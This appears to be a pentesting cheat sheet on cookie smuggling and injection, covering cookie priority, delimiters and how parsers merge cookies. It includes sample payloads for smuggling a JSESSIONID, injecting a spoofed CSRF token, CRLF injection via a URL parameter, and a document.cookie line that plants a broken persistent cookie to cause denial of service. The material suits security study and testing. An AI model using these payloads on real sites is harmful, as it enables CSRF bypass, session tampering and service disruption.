What is Cookie Smuggling and Injection
Cookie smuggling and injection exploit frontend vulnerabilities and the way servers interpret cookies, enabling attackers to smuggle cookies or retrieve HTTPS cookies.
Blog Article: Here (opens in a new tab)
Exploitation
Cookie Priority
# Default
1. Path length, longest to shortest
2. Last updated time, least recent to most recent
# Set Priority
- To target an already specific path, you can URL-encode the "/" character, making the URL longer while the server interprets it the same way.Cookie Delimitation
# Type of delimiter
- "
- ;
- ,
- [SPACE]Cookie Smuggling & Injection
# Smuggling & Injection
## Smuggling
RENDER_TEXT="**hello world; JSESSIONID=13371337; ASDF=end**"; ---> Single Cookie
## Injection
LANGUAGE="**en-us" CSRF_TOKEN="SPOOFED_VALUE**" ---> Inject cookie with Space
LANGUAGE=**en-us,CSRF_TOKEN=SPOOFED_VALUE** ---> Inject cookie with
- Smuggling: Injecting two vulnerable cookies around a target creates a "sandwich," causing the parser to treat them as one.
- Injection: Allows attackers to inject cookies, overwriting others to bypass CSRF tokens.
---------------------------------------------------------------------------------
# Injection via URL (CRLF %0D%0A Injection)
/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None
Injection of a persistent cookie that causes a denial of service (EXTRA)
document.cookie="�=🍪; domain=.grayduck.mn; Path=/; SameSite=Lax";- Cookie Name ---> � (This will make the cookie persistent, because of ASCI bug)
- 🍪 ---> 🍪 (This make some of the application break because of ASCI) Blog (opens in a new tab)